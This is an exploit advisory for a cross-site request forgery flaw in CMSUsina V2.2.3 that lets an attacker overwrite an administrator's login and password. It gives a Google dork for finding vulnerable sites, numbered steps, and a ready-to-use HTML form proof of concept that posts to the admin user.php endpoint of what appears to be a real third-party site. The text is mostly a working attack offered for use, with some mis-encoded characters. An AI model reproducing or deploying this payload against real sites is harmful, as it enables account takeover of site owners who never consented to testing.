====================================================================================================================================
| # Title     : CMSUsina V2.2.3 CSRF Add Admin Vulnerability                                                                       |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             |
| # Vendor    : http://www.ysy.com.br/                                                                                             |  
| # Dork      : "Desenvolvido por Usina da Criação"                                                                                |
====================================================================================================================================

poc :

[+] Dorking Ä°n Google Or Other Search Enggine.

[+] The following html code Edit admin .

[+] Go to the line 3.

[+] Set the target site link Save changes and apply . 

[+] infected file : site/adm/user.php.

[+] http://127.0.0.1/site/adm/user.php

[+] save code as poc.html .

 <p>Alterar seus dados de acesso</p> 
 <fieldset><legend>ALTERAR DADOS</legend> 
 <form name="editsenha" method="post" action="http://rcborgesconstrutoracombr/site/adm/user.php?acao=edit"> 
 <label><b>Usu&aacute;rio</b></label><br /> 
 <input type="text" name="login" value="." maxlength="14" size="70" /><br /><br /> <label>
 <b>Confirmar usu&aacute;rio</b></label><br /> <input type="text" name="login2" value="." maxlength="14" size="70" /><br />
 <br /> <label><b>Senha</b></label><br /> <input type="password" name="senha" value="." maxlength="14" size="70" /><br />
 <br /> <label><b>Confirmar senha</b></label><br /> <input type="password" name="senha2" value="." maxlength="14" size="70" /><br />
 <br /> <input type="submit" name="submit" value="Alterar senha" /> </form> </fieldset> <!-- fim conte?do --> </div> </td> </tr> 
 </table> </body> </html> 

Greetings to :=================================================================
jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |
===============================================================================